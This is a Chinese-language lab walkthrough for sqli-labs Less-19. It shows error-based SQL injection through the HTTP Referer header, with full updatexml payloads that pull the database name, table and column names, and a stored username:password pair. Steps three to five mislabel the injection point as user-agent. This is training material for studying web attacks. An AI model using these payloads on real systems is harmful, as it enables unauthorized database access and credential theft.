sqli-labs-Less-19自动化注入方法

sqli-labs 实验记录

Less-19

这一关与第18关类似,需要通过分析源码进行手动报错注入,但注入点与之前的关卡不同,为Referer。

第一步:分别输入正确与错误的用户名与密码,查找注入点

结合上一关爆出的数据,在用户与密码栏中分别输入正确与错误的数据:uname=Dumb passwd=12 与passwd=Dumb

结果如图如示:在密码正确的页面返回了Your Referer is: ......,密码错误的页面无任何回显。因此,我们考虑在Referer这一点进行报错注入。

第二步:查询服务器中的当前数据库

利用Hackbar插件,在Referer这一点输入如下数据:

复制代码
1' and updatexml(1,concat(0x7e,database(),0x7e),1) or '

updatexml 为报错注入函数。

结果如图所示:当前数据库为security。

第三步:查询指定数据库中的表

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or '

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的列

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) or '

查询结果如图所示:数据列共有3个,分别是id,username,password。

第五步:查询指定数据表中的具体信息

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select concat(username,':',password) from security.users limit 0,1),0x7e),1) or '

结果如图所示:查询出一条数据,用户名为Dumb,密码为12。

如果需要继续查找其它数据,只需将"limit 0,1"中的'0',进行相应的修改,如"limit 1,1","limit 2,1"等等。

相关推荐
测试修炼手册1 小时前
[测试工具] 用 Codex 做测试实战:从需求分析到自动化用例落地
运维·自动化·需求分析
HMS工业网络3 小时前
如何解决使用TwinCAT时EtherCAT网络出现“Sync Manager Watchdog”报错
网络·网络协议·网络安全
小江的记录本3 小时前
【Java基础】泛型:泛型擦除、通配符、上下界限定(附《思维导图》+《面试高频考点清单》)
java·数据结构·后端·mysql·spring·面试·职场和发展
掌心向暖RPA自动化5 小时前
桌面端RPA自动化,鼠标移动点击太机械怎么破?随机取点、贝塞尔移动、光标检测三步走
自动化·影刀rpa·rpa机器人·rpa入门·掌心向暖rpa自动化·rpa定制·rpa教程
сокол6 小时前
【网安-Web渗透测试-内网渗透】域环境权限维持
服务器·windows·网络安全·系统安全
bqq198610266 小时前
MySQL 8与MySQL 5.7的主要区别
数据库·mysql
chushiyunen6 小时前
r树索引、mysql对r树的支持
数据库·mysql
罗超驿7 小时前
16.深入理解数据库事务:从转账场景剖析ACID四大特性与回滚(Rollback)机制
数据库·mysql
@nengdoudou8 小时前
KingbaseES数据库MySQL模式使用 “GROUP BY“
数据库·mysql
码点滴8 小时前
K8s配置与存储运维自动化:从隐形杀手到 AI Agent 安全闭环
运维·人工智能·自动化